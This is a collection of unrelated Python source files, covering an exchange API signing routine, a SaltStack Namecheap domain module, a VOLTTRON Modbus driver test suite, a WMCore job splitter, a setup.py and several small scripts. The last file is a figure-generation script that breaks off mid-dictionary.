if 'cross_leverage_limit' in params:
if leverage != 0:
raise BadRequest(self.id + ' cross margin leverage(valid only when leverage is 0)')
request['cross_leverage_limit'] = str(params['cross_leverage_limit'])
params = self.omit(params, 'cross_leverage_limit')
response = getattr(self, method)(self.extend(request, params))
#
# {
# "value":"0",
# "leverage":"5",
# "mode":"single",
# "realised_point":"0",
# "contract":"BTC_USDT",
# "entry_price":"0",
# "mark_price":"62035.86",
# "history_point":"0",
# "realised_pnl":"0",
# "close_order":null,
# "size":0,
# "cross_leverage_limit":"0",
# "pending_orders":0,
# "adl_ranking":6,
# "maintenance_rate":"0.005",
# "unrealised_pnl":"0",
# "user":2436035,
# "leverage_max":"100",
# "history_pnl":"0",
# "risk_limit":"1000000",
# "margin":"0",
# "last_close_pnl":"0",
# "liq_price":"0"
# }
#
return response
def sign(self, path, api=[], method='GET', params={}, headers=None, body=None):
authentication = api[0] # public, private
type = api[1] # spot, margin, futures, delivery
query = self.omit(params, self.extract_params(path))
path = self.implode_params(path, params)
endPart = (path == '' if '' else '/' + path)
entirePath = '/' + type + endPart
url = self.urls['api'][authentication] + entirePath
if authentication == 'public':
if query:
url += '?' + self.urlencode(query)
else:
queryString = ''
if (method == 'GET') or (method == 'DELETE'):
if query:
queryString = self.urlencode(query)
url += '?' + queryString
else:
urlQueryParams = self.safe_value(query, 'query', {})
if urlQueryParams:
queryString = self.urlencode(urlQueryParams)
url += '?' + queryString
query = self.omit(query, 'query')
body = self.json(query)
bodyPayload = '' if (body is None) else body
bodySignature = self.hash(self.encode(bodyPayload), 'sha512')
timestamp = self.seconds()
timestampString = str(timestamp)
signaturePath = '/api/' + self.version + entirePath
payloadArray = [method.upper(), signaturePath, queryString, bodySignature, timestampString]
# eslint-disable-next-line quotes
payload = "\n".join(payloadArray)
signature = self.hmac(self.encode(payload), self.encode(self.secret), hashlib.sha512)
headers = {
'KEY': self.apiKey,
'Timestamp': timestampString,
'SIGN': signature,
'Content-Type': 'application/json',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
label = self.safe_string(response, 'label')
if label is not None:
message = self.safe_string_2(response, 'message', 'detail', '')
Error = self.safe_value(self.exceptions, label, ExchangeError)
raise Error(self.id + ' ' + message)
|
py | 1a303f5dd3f04b543141a87c6dbda94b607b0415 | # -*- coding: utf-8 -*-
'''
Namecheap domains management
.. versionadded:: 2017.7.0
General Notes
-------------
Use this module to manage domains through the namecheap
api. The Namecheap settings will be set in grains.
Installation Prerequisites
--------------------------
- This module uses the following python libraries to communicate to
the namecheap API:
* ``requests``
.. code-block:: bash
pip install requests
- As saltstack depends on ``requests`` this shouldn't be a problem
Prerequisite Configuration
--------------------------
- The namecheap username, api key and url should be set in a minion
configuration file or pillar
.. code-block:: yaml
namecheap.name: companyname
namecheap.key: a1b2c3d4e5f67a8b9c0d1e2f3
namecheap.client_ip: 162.155.30.172
#Real url
namecheap.url: https://api.namecheap.com/xml.response
#Sandbox url
#namecheap.url: https://api.sandbox.namecheap.xml.response
'''
from __future__ import absolute_import, print_function, unicode_literals
CAN_USE_NAMECHEAP = True
try:
import salt.utils.namecheap
except ImportError:
CAN_USE_NAMECHEAP = False
# Import 3rd-party libs
from salt.ext import six
def __virtual__():
'''
Check to make sure requests and xml are installed and requests
'''
if CAN_USE_NAMECHEAP:
return 'namecheap_domains'
return False
def reactivate(domain_name):
'''
Try to reactivate the expired domain name
returns the following information in a dictionary
issuccess bool indicates whether the domain was renewed successfully
amount charged for reactivation
orderid unique integer value for the order
transactionid unique integer value for the transaction
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.reactivate my-domain-name
'''
opts = salt.utils.namecheap.get_opts('namecheap.domains.reactivate')
opts['DomainName'] = domain_name
response_xml = salt.utils.namecheap.post_request(opts)
if response_xml is None:
return {}
domainreactivateresult = response_xml.getElementsByTagName('DomainReactivateResult')[0]
return salt.utils.namecheap.xml_to_dict(domainreactivateresult)
def renew(domain_name, years, promotion_code=None):
'''
Try to renew the specified expiring domain name for a specified number of years
returns the following information in a dictionary
renew bool indicates whether the domain was renewed successfully
domainid unique integer value for the domain
orderid unique integer value for the order
transactionid unique integer value for the transaction
amount charged for renewal
Required parameters:
domain_name
string The domain name you wish to renew
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.renew my-domain-name 5
'''
opts = salt.utils.namecheap.get_opts('namecheap.domains.renew')
opts['DomainName'] = domain_name
opts['Years'] = years
if promotion_code is not None:
opts['PromotionCode'] = promotion_code
response_xml = salt.utils.namecheap.post_request(opts)
if response_xml is None:
return {}
domainrenewresult = response_xml.getElementsByTagName("DomainRenewResult")[0]
return salt.utils.namecheap.xml_to_dict(domainrenewresult)
def create(domain_name, years, **kwargs):
'''
Try to create the specified domain name for the specified number of years
returns the following information in a dictionary
registered True/False
amount charged for registration
domainid unique integer value for the domain
orderid unique integer value for the order
transactionid unique integer value for the transaction
whoisguardenable True,False if enabled for this domain
nonrealtimedomain True,False if domain registration is instant or not
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.create my-domain-name 2
'''
idn_codes = set(['afr',
'alb',
'ara',
'arg',
'arm',
'asm',
'ast',
'ave',
'awa',
'aze',
'bak',
'bal',
'ban',
'baq',
'bas',
'bel',
'ben',
'bho',
'bos',
'bul',
'bur',
'car',
'cat',
'che',
'chi',
'chv',
'cop',
'cos',
'cze',
'dan',
'div',
'doi',
'dut',
'eng',
'est',
'fao',
'fij',
'fin',
'fre',
'fry',
'geo',
'ger',
'gla',
'gle',
'gon',
'gre',
'guj',
'heb',
'hin',
'hun',
'inc',
'ind',
'inh',
'isl',
'ita',
'jav',
'jpn',
'kas',
'kaz',
'khm',
'kir',
'kor',
'kur',
'lao',
'lav',
'lit',
'ltz',
'mal',
'mkd',
'mlt',
'mol',
'mon',
'mri',
'msa',
'nep',
'nor',
'ori',
'oss',
'pan',
'per',
'pol',
'por',
'pus',
'raj',
'rum',
'rus',
'san',
'scr',
'sin',
'slo',
'slv',
'smo',
'snd',
'som',
'spa',
'srd',
'srp',
'swa',
'swe',
'syr',
'tam',
'tel',
'tgk',
'tha',
'tib',
'tur',
'ukr',
'urd',
'uzb',
'vie',
'wel',
'yid'])
require_opts = ['AdminAddress1', 'AdminCity', 'AdminCountry', 'AdminEmailAddress', 'AdminFirstName',
'AdminLastName', 'AdminPhone', 'AdminPostalCode', 'AdminStateProvince', 'AuxBillingAddress1',
'AuxBillingCity', 'AuxBillingCountry', 'AuxBillingEmailAddress', 'AuxBillingFirstName',
'AuxBillingLastName', 'AuxBillingPhone', 'AuxBillingPostalCode', 'AuxBillingStateProvince',
'RegistrantAddress1', 'RegistrantCity', 'RegistrantCountry', 'RegistrantEmailAddress',
'RegistrantFirstName', 'RegistrantLastName', 'RegistrantPhone', 'RegistrantPostalCode',
'RegistrantStateProvince', 'TechAddress1', 'TechCity', 'TechCountry', 'TechEmailAddress',
'TechFirstName', 'TechLastName', 'TechPhone', 'TechPostalCode', 'TechStateProvince', 'Years']
opts = salt.utils.namecheap.get_opts('namecheap.domains.create')
opts['DomainName'] = domain_name
opts['Years'] = six.text_type(years)
def add_to_opts(opts_dict, kwargs, value, suffix, prefices):
for prefix in prefices:
nextkey = prefix + suffix
if nextkey not in kwargs:
opts_dict[nextkey] = value
for key, value in six.iteritems(kwargs):
if key.startswith('Registrant'):
add_to_opts(opts, kwargs, value, key[10:], ['Tech', 'Admin', 'AuxBilling', 'Billing'])
if key.startswith('Tech'):
add_to_opts(opts, kwargs, value, key[4:], ['Registrant', 'Admin', 'AuxBilling', 'Billing'])
if key.startswith('Admin'):
add_to_opts(opts, kwargs, value, key[5:], ['Registrant', 'Tech', 'AuxBilling', 'Billing'])
if key.startswith('AuxBilling'):
add_to_opts(opts, kwargs, value, key[10:], ['Registrant', 'Tech', 'Admin', 'Billing'])
if key.startswith('Billing'):
add_to_opts(opts, kwargs, value, key[7:], ['Registrant', 'Tech', 'Admin', 'AuxBilling'])
if key == 'IdnCode' and key not in idn_codes:
salt.utils.namecheap.log.error('Invalid IdnCode')
raise Exception('Invalid IdnCode')
opts[key] = value
for requiredkey in require_opts:
if requiredkey not in opts:
salt.utils.namecheap.log.error("Missing required parameter '" + requiredkey + "'")
raise Exception("Missing required parameter '" + requiredkey + "'")
response_xml = salt.utils.namecheap.post_request(opts)
if response_xml is None:
return {}
domainresult = response_xml.getElementsByTagName("DomainCreateResult")[0]
return salt.utils.namecheap.atts_to_dict(domainresult)
def check(*domains_to_check):
'''
Checks the availability of domains
returns a dictionary where the domain name is the key and
the availability is the value of True/False
domains_to_check
array of strings List of domains to check
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.check domain-to-check
'''
opts = salt.utils.namecheap.get_opts('namecheap.domains.check')
opts['DomainList'] = ','.join(domains_to_check)
response_xml = salt.utils.namecheap.get_request(opts)
if response_xml is None:
return {}
domains_checked = {}
for result in response_xml.getElementsByTagName("DomainCheckResult"):
available = result.getAttribute("Available")
domains_checked[result.getAttribute("Domain").lower()] = salt.utils.namecheap.string_to_value(available)
return domains_checked
def get_info(domain_name):
'''
Returns information about the requested domain
returns a dictionary of information about the domain_name
domain_name
string Domain name to get information about
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.get_info my-domain-name
'''
opts = salt.utils.namecheap.get_opts('namecheap.domains.getinfo')
opts['DomainName'] = domain_name
response_xml = salt.utils.namecheap.get_request(opts)
if response_xml is None:
return []
domaingetinforesult = response_xml.getElementsByTagName("DomainGetInfoResult")[0]
return salt.utils.namecheap.xml_to_dict(domaingetinforesult)
def get_tld_list():
'''
Returns a list of TLDs as objects
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.get_tld_list
'''
response_xml = salt.utils.namecheap.get_request(salt.utils.namecheap.get_opts('namecheap.domains.gettldlist'))
if response_xml is None:
return []
tldresult = response_xml.getElementsByTagName("Tlds")[0]
tlds = []
for e in tldresult.getElementsByTagName("Tld"):
tld = salt.utils.namecheap.atts_to_dict(e)
tld['data'] = e.firstChild.data
categories = []
subcategories = e.getElementsByTagName("Categories")[0]
for c in subcategories.getElementsByTagName("TldCategory"):
categories.append(salt.utils.namecheap.atts_to_dict(c))
tld['categories'] = categories
tlds.append(tld)
return tlds
def get_list(list_type=None,
search_term=None,
page=None,
page_size=None,
sort_by=None):
'''
Returns a list of domains for the particular user as a list of objects
offset by ``page`` length of ``page_size``
list_type
string Possible values are ALL/EXPIRING/EXPIRED
Default: ALL
search_term
string Keyword to look for on the domain list
page
integer Page to return
Default: 1
page_size
integer Number of domains to be listed in a page
Minimum value is 10 and maximum value is 100
Default: 20
sort_by
string Possible values are NAME/NAME_DESC/EXPIREDATE/
EXPIREDATE_DESC/CREATEDATE/CREATEDATE_DESC
CLI Example:
.. code-block:: bash
salt 'my-minion' namecheap_domains.get_list
'''
opts = salt.utils.namecheap.get_opts('namecheap.domains.getList')
if list_type is not None:
if list_type not in ['ALL', 'EXPIRING', 'EXPIRED']:
salt.utils.namecheap.log.error('Invalid option for list_type')
raise Exception('Invalid option for list_type')
opts['ListType'] = list_type
if search_term is not None:
if len(search_term) > 70:
salt.utils.namecheap.log.warning('search_term trimmed to first 70 characters')
search_term = search_term[0:70]
opts['SearchTerm'] = search_term
if page is not None:
opts['Page'] = page
if page_size is not None:
if page_size > 100 or page_size < 10:
salt.utils.namecheap.log.error('Invalid option for page')
raise Exception('Invalid option for page')
opts['PageSize'] = page_size
if sort_by is not None:
if sort_by not in ['NAME', 'NAME_DESC', 'EXPIREDATE', 'EXPIREDATE_DESC', 'CREATEDATE', 'CREATEDATE_DESC']:
salt.utils.namecheap.log.error('Invalid option for sort_by')
raise Exception('Invalid option for sort_by')
opts['SortBy'] = sort_by
response_xml = salt.utils.namecheap.get_request(opts)
if response_xml is None:
return []
domainresult = response_xml.getElementsByTagName("DomainGetListResult")[0]
domains = []
for d in domainresult.getElementsByTagName("Domain"):
domains.append(salt.utils.namecheap.atts_to_dict(d))
return domains
|
py | 1a304133d9c9c3a4d15a88abf0d59cfa798ca46c | import pytest
import gevent
import logging
import time
from volttron.platform import get_services_core
from master_driver.interfaces.modbus_tk.server import Server
from master_driver.interfaces.modbus_tk.maps import Map, Catalog
logger = logging.getLogger(__name__)
# modbus_tk driver config
DRIVER_CONFIG_STRING = """{
"driver_config": {
"name": "write_single_registers",
"device_address": "127.0.0.1",
"port": 5020,
"slave_id": 1,
"baudrate": 9600,
"bytesize": 8,
"parity": "none",
"stopbits": 1,
"xonxoff": 0,
"addressing": "offset",
"endian": "big",
"write_multiple_registers": false,
"register_map": "config://write_single_registers_map.csv"
},
"driver_type": "modbus_tk",
"registry_config": "config://write_single_registers.csv",
"interval": 120,
"timezone": "UTC"
}"""
# modbus_tk csv config
REGISTRY_CONFIG_STRING = """Volttron Point Name,Register Name
unsigned short,unsigned_short
sample bool,sample_bool"""
REGISTRY_CONFIG_MAP = """Register Name,Address,Type,Units,Writable,Default Value,Transform
unsigned_short,0,uint16,None,TRUE,0,scale(10)
sample_bool,16,bool,None,TRUE,False,"""
@pytest.fixture(scope="module")
def agent(request, volttron_instance):
"""Build MasterDriverAgent, add modbus driver & csv configurations
"""
# Build master driver agent
md_agent = volttron_instance.build_agent()
# Clean out master driver configurations
md_agent.vip.rpc.call('config.store',
'manage_delete_store',
'platform.driver')
# Add driver configurations
md_agent.vip.rpc.call('config.store',
'manage_store',
'platform.driver',
'devices/write_single_registers',
DRIVER_CONFIG_STRING,
config_type='json')
# Add csv configurations
md_agent.vip.rpc.call('config.store',
'manage_store',
'platform.driver',
'write_single_registers.csv',
REGISTRY_CONFIG_STRING,
config_type='csv')
md_agent.vip.rpc.call('config.store',
'manage_store',
'platform.driver',
'write_single_registers_map.csv',
REGISTRY_CONFIG_MAP,
config_type='csv')
master_uuid = volttron_instance.install_agent(agent_dir=get_services_core("MasterDriverAgent"),
config_file={},
start=True)
gevent.sleep(10) # wait for the agent to start and start the devices
def stop():
"""Stop master driver agent
"""
volttron_instance.stop_agent(master_uuid)
md_agent.core.stop()
request.addfinalizer(stop)
return md_agent
@pytest.fixture(scope='class')
def modbus_server(request):
ModbusClient = Catalog()['write_single_registers'].get_class()
server_process = Server(address='127.0.0.1', port=5020)
server_process.define_slave(1, ModbusClient, unsigned=False)
server_process.start()
time.sleep(1)
yield server_process
time.sleep(1)
server_process.stop()
@pytest.mark.usefixtures("modbus_server")
class TestModbusTKDriver:
"""
Regression tests for the write_single_registers driver interface.
"""
def get_point(self, agent, point_name):
"""
Issue a get_point RPC call for the named point and return the result.
@param agent: The test Agent.
@param point_name: The name of the point to query.
@return: The actual reading value of the point name from the RPC call.
"""
return agent.vip.rpc.call('platform.driver', 'get_point', 'write_single_registers', point_name).get(timeout=10)
def set_point(self, agent, point_name, point_value):
"""
Issue a set_point RPC call for the named point and value, and return the result.
@param agent: The test Agent.
@param point_name: The name of the point to query.
@param point_value: The value to set on the point.
@return:The actual reading value of the point name from the RPC call.
"""
return agent.vip.rpc.call('platform.driver', 'set_point', 'write_single_registers', point_name, point_value).get(timeout=10)
def scrape_all(self, agent):
"""
Issue a get_point RPC call for the device and return the result.
@param agent: The test Agent.
@return: The dictionary mapping point names to their actual values from the RPC call.
"""
return agent.vip.rpc.call('platform.driver', 'scrape_all', 'write_single_registers').get(timeout=10)
def revert_all(self, agent):
"""
Issue a get_point RPC call for the device and return the result.
@param agent: The test Agent.
@return: Return value from the RPC call.
"""
return agent.vip.rpc.call('platform.driver', 'revert_device', 'write_single_registers').get(timeout=10)
def revert_point(self, agent, point_name):
"""
Issue a get_point RPC call for the named point and return the result.
@param agent: The test Agent.
@param point_name: The name of the point to query.
@return: Return value from the RPC call.
"""
return agent.vip.rpc.call('platform.driver', 'revert_point', 'write_single_registers', point_name).get(timeout=10)
def test_default_values(self, agent):
"""Test set default values
"""
self.revert_all(agent)
default_values = self.scrape_all(agent)
assert type(default_values) is dict
for key in default_values.keys():
assert default_values[key] == 0
def test_set_point(self, agent):
"""Test set points to a new values
"""
set_value = self.set_point(agent, 'unsigned short', 6530)
assert set_value == 6530
set_value = self.set_point(agent, 'sample bool', True)
assert set_value == True
def test_get_point(self, agent):
"""Test get point after set point
"""
self.set_point(agent, 'unsigned short', 1230)
get_value = self.get_point(agent, 'unsigned short')
assert get_value == 1230
def test_revert_point(self, agent):
"""Test revert point to default value
"""
self.revert_point(agent, 'unsigned short')
get_value = self.get_point(agent, 'unsigned short')
assert get_value == 0
self.revert_point(agent, 'sample bool')
get_value = self.get_point(agent, 'sample bool')
assert get_value == False
def test_revert_all(self, agent):
"""Test revert device to default values
"""
self.revert_all(agent)
default_values = self.scrape_all(agent)
assert type(default_values) is dict
for key in default_values.keys():
assert default_values[key] == 0 |
py | 1a3041f1905cd4b062404e47d44d5493d384fed3 |
from fastlogging import LogInit
if __name__ == "__main__":
logger = LogInit(console = True, colors = True)
logger.debug("This is a debug message.")
logger.info("This is an info message.")
logger.warning("This is a warning message.")
logger.error("This is an error message.")
logger.fatal("This is a fatal message.")
logger.rotate()
logger.fatal("This is a fatal message.")
logger.fatal("This is a fatal message.")
logger.fatal("This is a fatal message.")
logger.shutdown()
|
py | 1a30420fa31052ced8b302cf5e349419c884389f | #!/usr/bin/env python
"""
_Harvest_
"""
from future.utils import viewitems
import threading
import logging
from WMCore.JobSplitting.JobFactory import JobFactory
from WMCore.Services.UUIDLib import makeUUID
from WMCore.DAOFactory import DAOFactory
from WMCore.JobSplitting.LumiBased import isGoodRun, isGoodLumi
from WMCore.DataStructs.Run import Run
from WMCore.WMSpec.WMTask import buildLumiMask
class Harvest(JobFactory):
"""
_Harvest_
Job splitting algoritm which creates a single job for all files
in the fileset (not neccessarily just available files).
Two distinct modes, Periodic and EndOfRun.
In Periodic mode, we periodically create a job processing all
files. A job will not be created until the previous job (if
there is one) has been completed and there are new available
files in the fileset. The specified period is the amount of
time in seconds between the end of a job and the creation of
another job.
In EndOfRun mode, create a job processing all files once the
input file has been closed. This means there will only be
a single job in total for the subscription.
For the EndOfRun mode support a sibling parameters that is
set if there is also a Periodic subscription. In this case
wait until the Periodic subscription is finished before
triggering the EndOfRun harvesting.
"""
def createJobsLocationWise(self, fileset, endOfRun, dqmHarvestUnit, lumiMask, goodRunList):
myThread = threading.currentThread()
fileset.loadData(parentage=0)
allFiles = fileset.getFiles()
# sort by location and run
locationDict = {}
runDict = {}
for fileInfo in allFiles:
locSet = frozenset(fileInfo['locations'])
runSet = fileInfo.getRuns()
if len(locSet) == 0:
logging.error("File %s has no locations!", fileInfo['lfn'])
if len(runSet) == 0:
logging.error("File %s has no run information!", fileInfo['lfn'])
# Populate a dictionary with [location][run] so we can split jobs according to those different combinations
if locSet not in locationDict:
locationDict[locSet] = {}
fileInfo['runs'] = set()
# Handle jobs with run whitelist/blacklist
if goodRunList:
runDict[fileInfo['lfn']] = set()
for run in runSet:
if run.run in goodRunList:
runDict[fileInfo['lfn']].add(run)
if run.run in locationDict[locSet]:
locationDict[locSet][run.run].append(fileInfo)
else:
locationDict[locSet][run.run] = [fileInfo]
elif lumiMask:
# it has lumiMask, thus we consider only good run/lumis
newRunSet = []
for run in runSet:
if not isGoodRun(lumiMask, run.run):
continue
# then loop over lumis
maskedLumis = []
for lumi in run.lumis:
if not isGoodLumi(lumiMask, run.run, lumi):
continue
maskedLumis.append(lumi)
if not maskedLumis:
continue
maskedRun = Run(run.run, *maskedLumis)
newRunSet.append(maskedRun)
if run.run in locationDict[locSet]:
locationDict[locSet][run.run].append(fileInfo)
else:
locationDict[locSet][run.run] = [fileInfo]
if newRunSet:
runDict[fileInfo['lfn']] = newRunSet
else:
# no LumiList and no run white or black list
runDict[fileInfo['lfn']] = runSet
for run in runSet:
if run.run in locationDict[locSet]:
locationDict[locSet][run.run].append(fileInfo)
else:
locationDict[locSet][run.run] = [fileInfo]
# create separate jobs for different locations
self.newGroup()
self.jobCount = 0
baseName = makeUUID()
self.newGroup()
if endOfRun:
harvestType = "EndOfRun"
else:
harvestType = "Periodic"
for location in locationDict:
if dqmHarvestUnit == "byRun":
self.createJobByRun(locationDict, location, baseName, harvestType, runDict, endOfRun)
else:
self.createMultiRunJob(locationDict, location, baseName, harvestType, runDict, endOfRun)
return
def createJobByRun(self, locationDict, location, baseName, harvestType, runDict, endOfRun):
"""
_createJobByRun_
Creates one job per run for all files available at the same location.
"""
for run in locationDict[location]:
# Should create at least one job for every location/run, putting this here will do
self.jobCount += 1
self.newJob(name="%s-%s-Harvest-%i" % (baseName, harvestType, self.jobCount))
for f in locationDict[location][run]:
for fileRun in runDict[f['lfn']]:
if fileRun.run == run:
self.currentJob['mask'].addRun(fileRun)
break
self.currentJob.addFile(f)
if endOfRun:
self.currentJob.addBaggageParameter("runIsComplete", True)
self.mergeLumiRange(self.currentJob['mask']['runAndLumis'])
return
def createMultiRunJob(self, locationDict, location, baseName, harvestType, runDict, endOfRun):
"""
_createMultiRunJob_
Creates a single harvesting job for all files and runs available
at the same location.
"""
self.jobCount += 1
self.newJob(name="%s-%s-Harvest-%i" % (baseName, harvestType, self.jobCount))
for run in locationDict[location]:
for f in locationDict[location][run]:
for fileRun in runDict[f['lfn']]:
if fileRun.run == run:
self.currentJob['mask'].addRun(fileRun)
break
if f not in self.currentJob['input_files']:
self.currentJob.addFile(f)
if endOfRun:
self.currentJob.addBaggageParameter("runIsComplete", True)
self.mergeLumiRange(self.currentJob['mask']['runAndLumis'])
# now calculate the minimum and maximum run number, it has to go to the root name
minRun = min(self.currentJob['mask']['runAndLumis'].keys())
maxRun = max(self.currentJob['mask']['runAndLumis'].keys())
self.currentJob.addBaggageParameter("multiRun", True)
self.currentJob.addBaggageParameter("runLimits", "-%s-%s" % (minRun, maxRun))
return
def mergeLumiRange(self, runLumis):
"""
_mergeLumiRange_
Merges the interesection of lumi ranges.
"""
for run, lumis in viewitems(runLumis):
lumis.sort(key=lambda sublist: sublist[0])
fixedLumis = [lumis[0]]
for lumi in lumis:
if (fixedLumis[-1][1] + 1) >= lumi[0]:
fixedLumis[-1][1] = lumi[1]
else:
fixedLumis.append(lumi)
self.currentJob['mask']['runAndLumis'][run] = fixedLumis
def algorithm(self, *args, **kwargs):
"""
_algorithm_
"""
myThread = threading.currentThread()
periodicInterval = kwargs.get("periodic_harvest_interval", 0)
periodicSibling = kwargs.get("periodic_harvest_sibling", False)
dqmHarvestUnit = kwargs.get("dqmHarvestUnit", "byRun")
runs = kwargs.get("runs", None)
lumis = kwargs.get("lumis", None)
runWhitelist = set(kwargs.get('runWhitelist', []))
runBlacklist = set(kwargs.get('runBlacklist', []))
goodRunList = runWhitelist.difference(runBlacklist)
daoFactory = DAOFactory(package="WMCore.WMBS",
logger=myThread.logger,
dbinterface=myThread.dbi)
releasePeriodicJobDAO = daoFactory(classname="JobSplitting.ReleasePeriodicJob")
periodicSiblingCompleteDAO = daoFactory(classname="JobSplitting.PeriodicSiblingComplete")
fileset = self.subscription.getFileset()
fileset.load()
lumiMask = {}
if runs and lumis:
lumiMask = buildLumiMask(runs, lumis)
if periodicInterval and periodicInterval > 0:
# Trigger the Periodic Job if
# * it is the first job OR
# * the last job ended more than periodicInterval seconds ago
triggerJob = releasePeriodicJobDAO.execute(subscription=self.subscription["id"], period=periodicInterval)
if triggerJob:
myThread.logger.debug("Creating Periodic harvesting job")
self.createJobsLocationWise(fileset, False, dqmHarvestUnit, lumiMask, goodRunList)
elif not fileset.open:
# Trigger the EndOfRun job if
# * (same as Periodic to not have JobCreator go nuts and stop after the first iteration)
# * there is no Periodic sibling subscription OR
# * the Periodic sibling subscription is complete
triggerJob = releasePeriodicJobDAO.execute(subscription=self.subscription["id"], period=3600)
if triggerJob and periodicSibling:
triggerJob = periodicSiblingCompleteDAO.execute(subscription=self.subscription["id"])
if triggerJob:
myThread.logger.debug("Creating EndOfRun harvesting job")
self.createJobsLocationWise(fileset, True, dqmHarvestUnit, lumiMask, goodRunList)
return
|
py | 1a30423226ce9ab558f07c0ade68374e66048de9 | Experiment(description='Trying latest code on classic data sets',
data_dir='../data/tsdlr-renamed/',
max_depth=10,
random_order=False,
k=1,
debug=False,
local_computation=False,
n_rand=9,
sd=2,
jitter_sd=0.1,
max_jobs=400,
verbose=False,
make_predictions=False,
skip_complete=True,
results_dir='../results/2014-01-16-GPSS-full/',
iters=250,
base_kernels='SE,Per,Lin,Const,Noise',
random_seed=3,
period_heuristic=3,
max_period_heuristic=5,
period_heuristic_type='min',
subset=True,
subset_size=250,
full_iters=10,
bundle_size=5,
additive_form=False,
mean='ff.MeanZero()', # Starting mean
kernel='ff.NoiseKernel()', # Starting kernel
lik='ff.LikGauss(sf=-np.Inf)', # Starting likelihood
score='bic',
search_operators=[('A', ('+', 'A', 'B'), {'A': 'kernel', 'B': 'base'}),
('A', ('*', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),
('A', ('*-const', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),
('A', 'B', {'A': 'kernel', 'B': 'base'}),
('A', ('CP', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('CW', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('B', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('BL', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('None',), {'A': 'kernel'})])
|
py | 1a30435be98cac62eb2411e405c70fd46cae1f64 | movie_budget = float(input())
amount_of_statists = int(input())
price_for_clothes_for_one_statist = float(input())
decor = movie_budget * (10/100)
total_price_for_clothes = price_for_clothes_for_one_statist * amount_of_statists
if amount_of_statists > 150:
total_price_for_clothes *= 0.90
total_movie_amount = total_price_for_clothes + decor
if total_price_for_clothes + decor > movie_budget:
print("Not enough money!")
print(f"Wingard needs {total_movie_amount - movie_budget:.2f} leva more.")
elif total_price_for_clothes + decor <= movie_budget:
print("Action!")
print(f"Wingard starts filming with {movie_budget - total_movie_amount:.2f} leva left.") |
py | 1a30438cf9de8ad0ff1abc9511083c8c94a41afd | from setuptools import setup, find_packages
with open('README.md') as f:
readme = f.read()
setup(
name='Workbench',
version='0.1.1',
description='Timesaver for psd2html (markup)',
long_description=readme,
author='Bohdan Khorolets',
author_email='[email protected]',
url='https://github.com/khorolets/workbench',
packages=find_packages(),
entry_points={
'console_scripts': [
'workbench = workbench.__init__:manager.run',
],
},
install_requires=list(filter(None, [
'flask',
'flask-script',
'elizabeth',
])),
)
|
py | 1a3043bb509bd9f486ffad888b2bad22b07531b8 | import util as ut, glob, os, dset, box, img as ig, experiments, numpy as np, scipy.io, camo, copy, rotation, mvg, imtable, iputil as ip, pylab, planefit, glob, tour
# Code for generating the figures/videos in the paper and the talk
RESDIR_LOO = '/data/scratch/aho/camo-results/camera-ready-loo/loo'
RESDIR_NOLOO = '/data/scratch/aho/camo-results/camera-ready-noloo/noloo'
STATS_PATH = '/data/vision/billf/camo/camo/nondetect/results/stats/stats.pk'
ALL_SCENES = experiments.classic_scenes + experiments.new_scenes
def make_path(loo_s, alg_name, scene = ''):
assert loo_s in ('loo', 'noloo')
base = RESDIR_LOO if loo_s == 'loo' else RESDIR_NOLOO
return ut.pjoin(base, idx_from_alg(alg_name), scene)
def idx_from_alg(alg_name):
return str(METHODS.index(alg_name)+1)
def path_from_scene(scene):
return ut.pjoin('../data', scene)
# duplicated from 4-8 in experiments.py
METHODS = ['uniform', 'mean', 'random', 'greedy', 'occlusion', 'stable-robust', 'occlusion-wide', 'interior-wide', 'occlusion-wide-nostable']
tested_scenes = experiments.classic_scenes + experiments.new_scenes
def make_teaser():
name = 'bookshelf-real'
in_dir = make_path('noloo', 'interior-wide', name)
out_dir = '../results/teaser-bookshelf-interior'
ut.mkdir(out_dir)
print in_dir
for in_fname in sorted(glob.glob(ut.pjoin(in_dir, '*.jpg'))):
base = os.path.split(in_fname)[1]
out_fname = ut.pjoin(out_dir, base.replace('.jpg', '.pdf'))
assert not os.path.exists(out_fname)
print in_fname, out_fname
os.system('convert %s %s' % (in_fname, out_fname))
def make_scene_fig(nscenes = 20, ims_per_scene = 2, todo = ['fig']):
with ut.constant_seed(0):
method = 'occlusion-wide'
# random sample
#all_scenes = sorted(glob.glob(make_path('noloo', method, '*')))
#scenes = ut.sample_at_most(all_scenes, nscenes)
#already_in_paper = 'couch3-real bookshelf-real'.split()
already_in_paper = ''.split()
ok_scenes = []
# these mess up the diagram
for scene in tested_scenes:
shape = dset.Scan(path_from_scene(scene)).full_shape
ratio = (float(shape[1]) / float(shape[0]))
if abs(ratio - 1.5 ) >= 0.01 or (scene in already_in_paper):
print 'skipping', scene, 'bad aspect ratio', ratio, 'or already in paper'
else:
ok_scenes.append(scene)
#scenes = ut.sample_at_most(ut.shuffled(scenes), nscenes)
scenes = ut.sample_at_most(ut.shuffled(ok_scenes), nscenes)
print '\n'.join(scenes)
if 'show' in todo:
table = []
for scene in scenes:
print scene
scan = dset.Scan(path_from_scene(scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]
row = [scene]
assert ims_per_scene == 2
# show frames from this result
# choose two that aren't used in the solution and which are representative viewpoints
# this is nontrivial to do programmatically; pick them by hand
# include in the UI a way to verify that the same image is not being used
# note that due to the sampling some views might be of faces that have no label (check this!)
for frame in scan.frames:
row += [frame, ('cycle', [mesh.render(scan, frame, texel_colors), scan.im(frame)])]
table.append(row)
ig.show(table)
if 'fig' in todo:
frame_choices = \
{'mit-31' : 11,
'mit-29' : 0,
'disrupt-8' : 12,
'mit-12': 15,
'patio2-real' : 1,
